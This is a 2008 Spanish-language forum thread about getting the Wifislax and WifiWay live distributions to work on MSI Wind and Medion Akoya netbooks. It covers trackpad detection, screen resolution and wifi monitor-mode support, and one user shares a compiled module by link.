chinitiw
*******
Desconectado Desconectado

Mensajes: 5521

][game 0ver][


Ver Perfil
« Respuesta #13 : 24-09-2008, 00:03 (Mi?rcoles) »

Cita de: Elena_FranciX
Akoya mete un WI-FI 802.11n que no vale para nada, ni auditoria y esta mas sordo que mi abuela del pueblo

Saludos
En línea
Juhn_Hoo
**
Desconectado Desconectado

Mensajes: 19


Ver Perfil
« Respuesta #14 : 18-11-2008, 00:52 (Martes) »

La coña es que Wifislax funciona, la broadcom funciona en monitor e inyecta tráfico con la versión wifislax 3.1 por defecto.

La primera pega es la siguiente:

Para hacer andar el ratón lo que hay que hacer es tocar el trackpad mientras arranca la máquina y luego no se porque te lo detecta, ya que a veces lo detecta y a veces no. Pues si jugueteas con el mientras arranca lo detecta.

La segunda pega... que creo que es solventable... seguro que por el foro habrá algún crack que me hecha un cable para que por dios la resolucion de 800x600 es una mier..... se podría alcanzar la de 1024x600???

Que necesito hacer a mi usb bootable para que alcance dicha resolución???

Por lo demas funciona bien, al menos lo que yo he probado
En línea
Elena_FranciX
*******
Desconectado Desconectado

Mensajes: 896


Mordedor@


Ver Perfil
« Respuesta #15 : 25-11-2008, 10:27 (Martes) »

Cita de: Juhn_Hoo
la resolucion de 800x600 es una mier..... se podría alcanzar la de 1024x600???

¿Resolución de 800x600? ¿en MSI?

- 10" Amplia Pantalla LCD
MSI ha escogido una amplia pantalla LCD de 10" para el portátil Wind - U100 como contraposición a los tamaños más pequeños habituales en estos portátiles ligeros, para proporcionar mejor comodidad viendo o leyendo. Además, la resolución 1024x600 permite utilizar la pantalla completa para visitar páginas Web, dándole la libertad explorando Internet.


resolución 1024x600
En línea
Juhn_Hoo
**
Desconectado Desconectado

Mensajes: 19


Ver Perfil
« Respuesta #16 : 25-11-2008, 13:07 (Martes) »

Buenos días Elena_FranciX

Evidentemente la resolución máxima del MSI WIND es de 1024x600 pero el problema reside que cuando cargo wifislax desde usb solo alcanza los 800x600 lo cual me parece una pua ya que para trastear cuanto más grande sea la pantalla mejor.

Si alguien me puede ayudar la gráfica que lleva es una intel 945.

Gracias por todo y disculpad las posibles molestias causadas.

Cordialmente,

Juhn_Hoo
En línea
termikina
****
Desconectado Desconectado

Mensajes: 64


Termyk


Ver Perfil WWW
« Respuesta #17 : 26-11-2008, 23:53 (Mi?rcoles) »

He compilado un modulo que os permitirá usar WifiWay en vuestro NetBook:
https://foro.seguridadwireless.net/descargas_download_wifislax_wifiway/wifiway_para_eee_pc_901_904_1000_medion_akoya_mini-t17710.0.html

Espero que os sea de utilidad  Wink
En línea

El futuro pertence a aquellos que creen en la belleza de sus sueños
Juhn_Hoo
**
Desconectado Desconectado

Mensajes: 19


Ver Perfil
« Respuesta #18 : 27-11-2008, 12:16 (Jueves) »

Buenos días termikina

Si funciona como dices te has lucido, estaba empezando a desesperar por el tema de la resolución. No obstante tengo una pregunta para ti:

Este pedazo de módulo también sirve para Wifislax???

Gracias por todo y disculpa las posibles molestias causadas.

Cordialmente,

Juhn_Hoo
En línea
termikina
****
Desconectado Desconectado

Mensajes: 64


Termyk


Ver Perfil WWW
« Respuesta #19 : 27-11-2008, 12:53 (Jueves) »

Buenos días termikina

Si funciona como dices te has lucido, estaba empezando a desesperar por el tema de la resolución. No obstante tengo una pregunta para ti:

Este pedazo de módulo también sirve para Wifislax???

Gracias por todo y disculpa las posibles molestias causadas.

Cordialmente,

Juhn_Hoo

Lo he compilado todo en WifiWay, pero por probar que no quede Wink
Si diera problemas en WifiSlax podría revisar el módulo para dar compatibilidad a las dos lives o hacer otro módulo para WifiSlax.

Preparar los drivers para la gráfica entre archivos XML y una aplicación windows que te los generaba y demás, para echarse a temblar, pero ha merecido la pena!!

Con la tarjeta Wifi solo he conseguido modo monitor, pero podéis usar vuestro NetBook para hacer auditoria con cualquier otra usb sin problemas y eso es lo importante, ademas os he añadido soporte para los mods de panel táctil Cool vamos que más de uno va a parecer escapado de la serie CSI  Grin
En línea

El futuro pertence a aquellos que creen en la belleza de sus sueños
Páginas: [1] 2 Ir Arriba Imprimir 
« anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Las cookies de este sitio web se usan para personalizar el contenido y los anuncios, ofrecer funciones de redes sociales y analizar el tráfico. Además, compartimos información sobre el uso que haga del sitio web con nuestros partners de redes sociales, publicidad y análisis web, quienes pueden combinarla con otra información que les haya proporcionado o que hayan recopilado a partir del uso que haya hecho de sus servicios
Si continúa navegando consideramos que acepta su uso. OK Más información | Y más
Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines
SMFAds for Free Forums